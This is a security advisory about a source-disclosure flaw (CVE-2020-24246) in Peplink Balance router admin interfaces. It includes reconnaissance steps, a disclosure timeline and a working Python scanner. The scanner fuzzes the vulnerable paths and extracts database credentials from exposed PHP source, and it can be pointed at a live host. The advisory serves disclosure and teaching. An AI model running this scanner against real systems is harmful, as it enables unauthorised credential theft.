A few months ago, BSSI performed a penetration test on a perimeter that included the web admin interface of a Peplink Balance router.
This article describes a vulnerability discovered by the BSSI auditing team that allows an unauthenticated attacker to download certain source files from the web admin interface. These files can contain sensitive information, including credentials for connecting to a SQL database (DBMS). All Peplink Balance products running a firmware version earlier than 8.1.0 RC1 are affected.
The web admin interface of Peplink Balance products is used to administer and configure Peplink routers.
The product can be tried out with the credentials admin / admin on the public demo instance: http://balancedemo.peplink.com
Peplink-23005: PHP source files served without being interpreted
Since the penetration test was performed in black-box conditions, it was first necessary to understand how the administration interface and its environment work. An initial analysis of the interface was therefore carried out in three phases, in order to map its tree structure.
First, manual browsing of the application showed that all discovered files were located under /cgi-bin/MANGA and /cgi-bin/HASync, and that all of them had the .cgi extension. In other words, the web server interprets this extension correctly before returning the output to the browser.
Then, OSINT research allowed us to broaden the list of entry points (still with the .cgi extension). This research relies on Google Dorks, GitHub repositories and previous exploit disclosures, among other sources.
Tip: OSINT research through Google Dorks and GitHub repositories often uncovers new entry points without a single request reaching the targeted web server. By definition, this research relies on the indexing (voluntary or not) of the web service by third parties, so it leaves no trace in the target's logs.
Finally, automated browsing was conducted by fuzzing .cgi files and folders (with tools such as Dirb, Patator or WFuzz). This fuzzing uncovered the /filemanager/php/ folder, whose name suggests that it contains .php files.
A second automated pass then fuzzed folders and .php files under that path, in order to better target the content potentially present in the folder. One positive result came back: connector.php
Because the front web server does not interpret PHP files, requesting connector.php returns its raw source code instead of executing it. A quick way to confirm this is to look for the <?php opening tag in the response body: an interpreted script never returns it.
This vulnerability therefore allows an unauthenticated attacker to access and download the source code of these PHP files, simply because the front web server serves them as static files instead of interpreting them.
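The two fuzzing passes and the source-disclosure check described above, as an added example that is not BSSI's tooling or Peplink's code. The folder names come from the article; the file-name wordlist, the credential patterns and the server responses are constructed for illustration. The HTTP layer sits behind a `fetch` callable so the example runs offline against a fake server; `http_fetch` builds an equivalent fetcher with the standard library for use against a target you are authorised to test.

```python
"""Probe candidate paths under a web admin interface and flag responses that
return raw PHP source (a PHP open tag in a 200 body) instead of an interpreted
page, then pull obvious credential assignments out of the disclosed source."""
import re
from typing import Callable, Dict, List, Tuple

# Folders reported in the article; the file names are an assumed mini-wordlist
# (a real run would use a full wordlist such as those shipped with Dirb/WFuzz).
CANDIDATE_DIRS = ["/cgi-bin/MANGA", "/cgi-bin/HASync", "/filemanager/php"]
CANDIDATE_NAMES = ["index", "connector", "config"]
EXTENSIONS = [".cgi", ".php"]

PHP_OPEN_TAG = re.compile(rb"<\?php\b|<\?=")
# Matches  $db_user = 'x';   $DB_PASS = "y";   'password' => "z"
CRED_ASSIGN = re.compile(
    rb"""['"]?(?P<key>\$?\w*(?:user|pass|pwd|secret)\w*)['"]?\s*(?:=>|=)\s*['"](?P<val>[^'"]*)['"]""",
    re.IGNORECASE,
)

Fetch = Callable[[str], Tuple[int, bytes]]


def classify_response(status: int, body: bytes) -> str:
    """'missing' for 404, 'source-disclosure' when a 200 body still carries a
    PHP open tag (the server shipped the script instead of running it),
    'interpreted' otherwise."""
    if status == 404:
        return "missing"
    if status == 200 and PHP_OPEN_TAG.search(body):
        return "source-disclosure"
    return "interpreted"


def harvest_credentials(body: bytes) -> Dict[str, str]:
    """Return {variable_or_key: value} for credential-looking assignments."""
    found: Dict[str, str] = {}
    for m in CRED_ASSIGN.finditer(body):
        found[m.group("key").decode(errors="replace")] = m.group("val").decode(errors="replace")
    return found


def candidate_paths() -> List[str]:
    """Cartesian product folder x name x extension, i.e. both fuzzing passes."""
    return [f"{d}/{n}{e}" for d in CANDIDATE_DIRS for n in CANDIDATE_NAMES for e in EXTENSIONS]


def scan(fetch: Fetch) -> List[Tuple[str, str, Dict[str, str]]]:
    """Probe every candidate path; return (path, verdict, creds) for hits only."""
    hits = []
    for path in candidate_paths():
        status, body = fetch(path)
        verdict = classify_response(status, body)
        if verdict == "missing":
            continue
        creds = harvest_credentials(body) if verdict == "source-disclosure" else {}
        hits.append((path, verdict, creds))
    return hits


# Constructed responses standing in for the target (not captured from a device).
FAKE_SERVER: Dict[str, Tuple[int, bytes]] = {
    "/cgi-bin/MANGA/index.cgi": (200, b"<html><title>Web Admin</title></html>"),
    "/filemanager/php/connector.php": (
        200,
        b"<?php\n// constructed elFinder-style DB config, not a real file\n"
        b"$db_host = 'localhost';\n$db_user = 'elfinder';\n$db_pass = 'Ch4ngeMe!';\n",
    ),
}


def fake_fetch(path: str) -> Tuple[int, bytes]:
    return FAKE_SERVER.get(path, (404, b"Not Found"))


def http_fetch(base_url: str) -> Fetch:
    """Build a real fetcher (stdlib urllib) for an authorised target."""
    import urllib.error
    import urllib.request

    def fetch(path: str) -> Tuple[int, bytes]:
        try:
            with urllib.request.urlopen(base_url + path, timeout=10) as resp:
                return resp.status, resp.read()
        except urllib.error.HTTPError as err:
            return err.code, err.read()

    return fetch


if __name__ == "__main__":
    for path, verdict, creds in scan(fake_fetch):
        print(f"{verdict:18} {path}  {creds or ''}")
```

Against the fake server the scan reports /cgi-bin/MANGA/index.cgi as interpreted and /filemanager/php/connector.php as a source disclosure carrying `$db_user` and `$db_pass`; swapping `fake_fetch` for `http_fetch("http://host")` runs the same logic over the network.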
Several sensitive files were discovered, including the SQL configuration file used by the elFinder file-manager framework (connector.php is elFinder's server-side connector). For the purposes of this article, the screenshot below shows the file as found on the Peplink Balance demo interface, which does not contain sensitive data:
Upon discovering the vulnerability, the BSSI auditing team contacted the Peplink team responsible for the product and reported it to them. A patch was made available on July 2, 2020 (version 8.1.0 RC1).
This vulnerability is now tracked as CVE-2020-24246 and is listed in Peplink's release notes (page 13, item 23005): https://download.peplink.com/resources/firmware-8.1.0rc1-release-notes.pdf
17/06/2020 – Discovery of the vulnerability
19/06/2020 – First contact with Peplink's cyber-security team
22/06/2020 – Vulnerability report sent to Peplink
03/07/2020 – Vulnerability fixed in the 8.1.0 RC1 release
03/10/2020 – Public disclosure (patch + 90 days)